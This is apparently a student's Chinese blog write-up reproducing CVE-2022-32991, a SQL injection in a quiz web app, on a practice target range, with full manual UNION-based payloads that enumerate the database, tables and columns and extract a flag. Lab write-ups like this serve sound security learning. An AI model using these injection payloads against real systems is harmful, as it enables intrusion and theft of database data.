近况小结:
期末全科通过(^-^)V,然后熬过了期末后的为期近一个月所谓的实(shui)践(ke)小学期后,刚回到家,闲来无事,突发奇想想试试之前看到的春秋云镜靶机,进行一下漏洞复现(省的自己再搭环境了)
让我们开始正题吧:
CVE-2022-32991
漏洞情报
Web Based Quiz System v1.0版本存在SQL注入漏洞,该漏洞源于welcome.php中的eid参数缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令窃取数据库敏感数据。
依照提示确认了一下存在SQL注入
之战的话考虑直接用sqlmap跑一下
但是出于练习考虑,先进行手注练习
先测试了一下它的各个功能
随便编了一下就直接注册成功了(别输真的嗷)
进入到了welcom页面
观察后考虑到是sql注入的原因,于是从第三个选项开始进行测试
进入到第三项后发现了注入点eid值单引号测试后报错于是开始进行测试
' or ' 1'='1 --%20
爆出所有的用户数据
爆破字段数
爆破到第6时页面报错
'or 1=1 order by 6 --%20
'union select 1,2,3,4,5
发现显示点为3
' union select 1,2,database(),4,5 --%20
爆库名
库名为ctf
爆表名:
'union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema='ctf' --%20
发现flag表
' union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name='flag' --%20
爆列名
最后直接获取数据
' union select 1,2,flag,4,5 from flag --%20
至此手注结束
耗时近半个小时
flag{932a9f78-defb-4d08-9011-7b177e89abab}